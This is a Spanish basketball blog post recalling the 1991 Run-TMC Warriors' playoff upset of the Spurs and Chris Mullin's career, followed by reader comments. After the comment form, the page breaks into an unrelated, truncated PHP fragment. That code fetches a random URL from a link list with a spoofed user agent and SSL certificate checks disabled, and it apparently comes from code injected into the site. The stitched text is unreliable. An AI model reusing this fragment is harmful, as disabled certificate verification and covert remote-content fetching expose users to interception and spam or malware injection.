Partidos históricos: La chaqueta metálica

27 de March de 2012 por TheDeerHunter

No se puede evitar. Por fuerza toca abrir un paréntesis en la rutina diaria para recuperar la serie de grandes partidos históricos. La retirada del jersey #17 de los Warriors, propiedad de Chris Mullin durante 13 campañas, merece un homenaje, y mucho me temo que ha de ser ahora o nunca, porque no estamos hablando de un mega-campeonísimo. Lamentablemente hay ciertas maravillas que tienden a caer en el más oscuro de los olvidos.

El uso y abuso del NBA 2K12 (algunos me entenderéis) me obliga a hacer extensión al homenaje. Estoy hablando de una experiencia baloncestística única que sólo pudo disfrutarse en el breve plazo de dos campañas. Estoy hablando del mítico Run-TMC. El genio de Nelson con un Run&Gun en plan kamikaze total. Los Warriors de la 90-91. Im-pres-cin-di-bles.

Es posible que los más jóvenes apenas sepáis quién es Chris Mullin. Diría que, con la excepción agita-toallas de Christian Laettner, era la figura más humana del Dream Team. Una especie de versión zurda de Larry Bird, con una clase y conocimiento baloncestístico inmejorables más una disciplina y físico casi militar, pero de alguna forma más accesible que “El pájaro”. Daba la sensación de ser el tipo de jugador al que cualquiera podía aspirar convertirse  a base de trabajo, eso sí, de intensísimo trabajo.

Con él se entiende algo más esa obsesión que ha tenido siempre Don Nelson por los aleros. El tipo hubiera salido con 5 aleros a cancha sin inmutarse y si hubieran sido todos como Mullin a más de uno le hubiera llovido fuego del cielo.

Los Warriors del TMC eran un equipo con todo el talento del mundo en el perímetro. A Mullin se le unió primero Mitch Richmond y después Tim Hardaway (Tim + Mitch + Chris = TMC, a semejanza de un grupo de rap famoso aquellos años). El lituano Sarunas Marciulonis (canela fina como 6º hombre) llegó el mismo año que Tim y en 1990 se les unió Mario Ellie. Agüita. Por dentro eran algo más limitados. Un 7 pies sólido como Alton Lister y Tyrone Hill en su año rookie. Como si al loco Don esto le quitara el sueño.

De esta guisa se colaron los Warriors en los Playoffs de 1991. Séptimos con un balance de 44-38. 116,6 puntos anotados (los primeros) pero 115 puntos encajados (los últimos). Vamos, que algunas cosas nunca han cambiado.

Me vais a perdonar la licencia. No quería repetir equipos mientras fuera posible al principio de esta serie. Menos aún repetir víctimas propiciatorias. Sin embargo os confieso que este caso me inspira un placer un tanto perverso.

En la otra esquina del cuadrilátero, los San Antonio Spurs de Larry Brown y David Robinson en su segundo año. Sólidos campeones de la Midwest y segundos clasificados del Oeste. Robinson conformaba un juego interior temible junto a Terry Cummings y Massemburg de rookie (aunque éste no se comió un colín ese año). Por fuera, atención: Rod Strickland (que yo ni me acordaba), Sean Elliott y un extraordinario Willie Anderson (que ni me sonaba). Avery Johnson y Paul Pressey también estaban. Favoritos claros.

Para confirmarlo el primer partido de la serie se lo llevaba San Antonio endosándo a los Warriors 130 puntitos de nada. Robinson se ponía las botas. Diferencia en el rebote: 56 a 38.

¿Cómo derrotar en playoffs a un juego interior significativamente superior? Solución previsible de Don Nelson: Liarla parda… y si lo anterior no es suficiente insistir en la idea. Nelson apostaba con decisión en sus propias virtudes y lo demás lo dejaba en manos de la santa providencia. Quinteto titular del segundo partido de la serie: Hardaway, Elie, Richmond, Mullin y un tal Jim Petersen para 15 minutitos. Y a correr. De sexto, el lituano.

El resto es historia. En el segundo de la serie Larry Brown no logró sujetar al poker de ases que formaba el TMC+Marciulionis y palmatoria en el Alamo. En los 2 siguientes en Oakland, a 5 partidos, canguelitis típica del favorito, rollo “We Believe!” y fiestaza de las que gustan por aquellos lares. Se perdió mucho encanto eliminando aquellas primeras rondas a vida o muerte.

En segunda ronda no se pudo con los Lakers del último intento al anillo de Magic. El TMC se disolvió ese mismo año en uno de esos absurdos traspasos de los Warriors. Ritchmond a los Kings a cambio del rookie Billy Owens y un ronda. Para darse de cabezazos toda una vida.

Es esa brevedad lo que le da un encanto mayor. Unos jugones irrepetibles. Todavía somos un poquito románticos.

Comenta

7 comentarios a esta entrada

  1. Heineken dice:
    #1

    Hay alguno que todavía estará buscando a Tim Hardaway… que manera de driblar!
    Gran post!

      Citar

  2. rumbero dice:
    #2

    Como gustan estos artículo que os currais. A mi me esto me pilló demasiado joven, asi que siempre son un regalo estos viajes atrás. Precisamente el otro dia estuve viendo por tv3 un reportaje que dieron sobre el TMC…como molaban/corrian estos tios. Decía Hardaway que cuando cogía un rebote sabía que al levantar la cabeza vería a Mullin en la otra punta de la cancha pidiéndole el balón. No sabía como se lo hacía pero siempre estaba allí. Y sobre las tácticas de Nelson comentaban lo dicho aquí: 5 tios y a correr y liarla.
    El último video es genial, y encima uno redescubre a Marciulionis y esa corbataza de Don Nelson.

    PD: Es que acabo de ver un trozo del Unics Kazan 57 – Barça 67 y claro, ver que estos tios metian 116 puntos me fascina y emociona

      Citar

  3. Juan_Taf13 dice:
    #3

    Gran artículo, como curiosidad me gustaría añadir una cosa y es el problema que tenía mullin con la bebida al principio de su carrera, debido a las múltiples lesiones que sufrió sumergió sus penas en el alcohol, pero después se recuperó y dejó la bebida para convertirse en un grande de la liga, todo un ejemplo. También fue una gran persona, cuando manute bol, un jugador al que siempre habían tratado como un monstruo de feria, llegó a los warriors encontró en mullin a un amigo a alguien que le respetaba. Desde luego mullin pasará a la historia como jugador de baloncesto y como ejemplo de humanidad.

      Citar

  4. Esteban dice:
    #4

    aunque ese fue el momento de esplendor de MULLIN, su carrera no termino alli, recuerdo perfectamente su llegada a los pacers por el 97, primero jugnado en el 98 una final anticipada frente a los bulls, donde cayeron derrotados, un equipo de los pacers de lujo, marck jackson, miller, mullin, davis y smith,

    su rendimiento se mantuvo firme al siguiente curso, donde volvieron a caer en final de conferencia esta vez frente a los knicks de latrell y el mejor allan huoston de su carrera, sumado al salto al estrellato de marcus camby ante la lesion de ewing, y el recordado tiro de 3 puntos mas un libre de larry jhonson, para mantener con vida la serie para los knicks, mullin seguia aportando su tiro y su saber estar en la cancha, pero un chico desde el banco empezaba a pisarle los talones, era jalen rose

    llegaba el año 2000 y las finales de la nba pra los pacers, con venganza incluida frente a los knicks, mullin ya era suplente de rose, quien junto a miller llevaban adelante la ofensiva pacer, pero su papel seguia siendo de suma importancia, en la final se toparon con un shaq que hizo lo que quiso con el blanco rick y solo dale davis le mostro oposicion (los pacers habian traspado a antonio davis por jhonatan bender, con el quiza podrian haber hechoi sombra a shaq), sahq MVP de las finales con promedios de 38 puntos y 18 rebotes si no me equivoco

    su salida de los pacers le privo de pelear nuevamente por el titulo,

    perdonen pero queria recordar el gran trabajo hecho por mullin en esos pacers de los 90 que se quedaron varias veces en las puertas de todo, y donde mullin era un hombre de importancia

      Citar

  5. Txusma dice:
    #5

    Esos Pacers, los Jazz de Stockton y Malone o los Kings de Adelman son claros ejemplos de equipos que se quedaron siempre a las puertas. Que interesante tema para un artículo! (DeerHunter? Estás ahí?)

      Citar

  6. TheDeerHunter dice:
    #6

    Txusma:
    Esos Pacers, los Jazz de Stockton y Malone o los Kings de Adelman son claros ejemplos de equipos que se quedaron siempre a las puertas. Que interesante tema para un artículo! (DeerHunter? Estás ahí?)

    Frente al vicio de pedir…

      Citar

  7. Vader dice:
    #7

    TheDeerHunter: Frente al vicio de pedir…

    Jajajaja!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>